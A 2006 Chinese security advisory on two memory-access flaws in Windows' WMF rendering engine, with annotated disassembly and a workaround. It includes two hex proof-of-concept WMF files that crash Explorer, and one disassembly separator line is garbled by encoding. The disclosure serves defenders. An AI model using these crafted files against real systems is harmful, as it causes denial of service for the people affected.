发布日期：2006-01-09
更新日期：2006-01-09

受影响系统：

Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4

描述：

---

BUGTRAQ  ID: 16167

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows图形渲染引擎（GRE）在渲染WMF格式文件时存在多个非授权内存访问漏洞，攻击者可能利用此漏洞导致拒绝服务。

具体如下：

1. ExtCreateRegion调用导致非授权的内存访问

创建如下的WMF文件：

010009000003220000000100844300000000        //WMFHEAD
050000000B028B033F21                    //first WMFRECORD
04000000FF0044444444444444444444FFFF33333333333333333333FFFF41424344        //the vul \
WMFRECORD 030000000000                        //end WMFRECORD

问题代码如下：

.text:7F00FE07 loc_7F00FE07:                           ; CODE XREF: \
                PlayMetaFileRecord+1256j
.text:7F00FE07                 sub     eax, 3
.text:7F00FE0A                 jnz     loc_7F022B9A    ; 0xff
.text:7F00FE10                 movzx   ecx, word ptr [ebx+10h]    ;get total \
                "PointtStruct" number
.text:7F00FE14                 mov     [ebp-88h], ecx        ;save
.text:7F00FE1A                 test    ecx, ecx
.text:7F00FE1C                 jnz     short loc_7F00FE2E    ;jmp
.text:7F00FE1E                 xor     eax, eax
.text:7F00FE20                 push    eax             ; int
.text:7F00FE21                 push    eax             ; int
.text:7F00FE22                 push    eax             ; int
.text:7F00FE23                 push    eax             ; int
.text:7F00FE24                 call    CreateRectRgn
.text:7F00FE29                 jmp     loc_7F010494
.text:7F00FE2E ; 哪哪哪哪哪哪哪哪Ù \
38;哪哪哪哪哪哪哪哪哪哪 \
1738;哪哪哪哪哪哪哪哪哪哪& \
                #21738;哪哪哪哪哪哪?
.text:7F00FE2E
.text:7F00FE2E loc_7F00FE2E:                           ; CODE XREF: \
                PlayMetaFileRecord+C15j
.text:7F00FE2E                 xor     edi, edi
.text:7F00FE30                 mov     [ebp-8Ch], edi
.text:7F00FE36                 lea     eax, [ebx+1Ch]        ;get first "PointtStruct" \
                address
.text:7F00FE39                 mov     [ebp-90h], eax        ;save
.text:7F00FE3F                 and     [ebp-94h], edi            
.text:7F00FE45                 and     [ebp-98h], edi
.text:7F00FE4B                 test    ecx, ecx
.text:7F00FE4D                 jbe     short loc_7F00FE8C        
.text:7F00FE4F
.text:7F00FE4F loc_7F00FE4F:                           ; CODE XREF: \
                PlayMetaFileRecord+C83j
.text:7F00FE4F                 movzx   ecx, word ptr [eax]    ;get PointNum,here will \
                trigger memory access error**
.text:7F00FE52                 mov     edx, ecx                
.text:7F00FE54                 shr     edx, 1            ;PointNum/2
.text:7F00FE56                 add     edx, edi            ;sum PointNum/2
.text:7F00FE58                 cmp     edx, edi
.text:7F00FE5A                 jb      loc_7F0106D5
.text:7F00FE60                 mov     edi, edx
.text:7F00FE62                 mov     [ebp-8Ch], edi
.text:7F00FE68                 cmp     ecx, 7FFFFFFBh
.text:7F00FE6E                 jnb     loc_7F0106D5
.text:7F00FE74                 lea     eax, [eax+ecx*2+8]
.text:7F00FE78                 inc     dword ptr [ebp-98h]    ;counter+1
.text:7F00FE7E                 mov     ecx, [ebp-98h]
.text:7F00FE84                 cmp     ecx, [ebp-88h]        ;cmp total "PointtStruct" \
                number
.text:7F00FE8A                 jb      short loc_7F00FE4F    ;traverse all \
                "PointtStruct"
.text:7F00FE8C
.text:7F00FE8C loc_7F00FE8C:                                   ; CODE XREF: \
                PlayMetaFileRecord+C46j
.text:7F00FE8C                                                 ; PlayMetaFileRecord+14D8j
.text:7F00FE8C                 cmp     dword ptr [ebp-94h], 0
.text:7F00FE93                 jnz     loc_7F022BA2
.text:7F00FE99                 cmp     edi, 0FFFFFFDh
.text:7F00FE9F                 jnb     loc_7F022BA2
.text:7F00FEA5                 mov     eax, [ebp-8Ch]
.text:7F00FEAB                 add     eax, 2
.text:7F00FEAE                 shl     eax, 4
.text:7F00FEB1                 mov     [ebp-9Ch], eax
.text:7F00FEB7                 push    eax             ; uBytes
.text:7F00FEB8                 push    0               ; uFlags
.text:7F00FEBA                 call    ds:LocalAlloc        ;will allocate memory normally.
.text:7F00FEC0                 mov     edi, eax

2.ExtEscape POSTSCRIPT_INJECTION导致非授权的内存访问

创建如下的WMF文件：

010009000003220000000100844300000000    //WMFHEAD
050000000B028B033F21                //first WMFRECORD
0400000026001610FFFF444444444444444444444444444444444444444444444344    //the vul \
WMFRECORD 030000000000                    //end WMFRECORD

问题代码如下：

.text:7F027312 loc_7F027312:                           ; CODE XREF: ExtEscape+11Ej
.text:7F027312                                         ; ExtEscape+12Aj
.text:7F027312                 test    byte ptr [ecx+4], 40h
.text:7F027316                 jnz     loc_7F017CEC
.text:7F02731C                 mov     ebx, [ebp+arg_8]        ;we can cotrol this:cbSize
.text:7F02731F                 add     ebx, 1Ah            ;cbSize+0x1a
.text:7F027322                 and     ebx, 0FFFFFFFCh        ;cbSize+0x1a-4
.text:7F027325                 mov     eax, large fs:18h
.text:7F02732B                 mov     eax, [eax+30h]
.text:7F02732E                 push    ebx
.text:7F02732F                 push    0
.text:7F027331                 push    dword ptr [eax+18h]
.text:7F027334                 call    ds:RtlAllocateHeap    ;allocate memory \
                size=cbSize+0x16
.text:7F02733A                 test    eax, eax
.text:7F02733C                 jz      short loc_7F027385
.text:7F02733E                 mov     ecx, [ebp+arg_4]
.text:7F027341                 mov     [eax+0Ch], ecx
.text:7F027344                 mov     ecx, [ebp+arg_8]
.text:7F027347                 mov     [eax+10h], ecx
.text:7F02734A                 mov     edx, ecx
.text:7F02734C                 shr     ecx, 2
.text:7F02734F                 sub     ebx, 8
.text:7F027352                 mov     [eax+8], ebx
.text:7F027355                 lea     edi, [eax+14h]
.text:7F027358                 rep movsd            ;copy,here will trigger a memory error \
                likely**
.text:7F02735A                 mov     ecx, edx
.text:7F02735C                 and     ecx, 3
.text:7F02735F                 rep movsb
.text:7F027361                 mov     ecx, [ebp-4]
.text:7F027364                 mov     edi, [ebp+arg_14]
.text:7F027367                 lea     edx, [ecx+48h]
.text:7F02736A                 mov     esi, [edx+4]
.text:7F02736D                 mov     [eax+4], esi

浏览了恶意WMF格式文件就可能导致拒绝服务（explorer.exe重启）。请注意这两个漏洞与MS05-053或MS06-001中所述漏洞无关。

<*来源：frankruder （frankruder@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113683172125870&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=113683110103488&w=2
*>

建议：

---

临时解决方法：

* 注销Windows图片和传真查看器（Shimgvw.dll）。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：4105
严重程度：0（网友投票）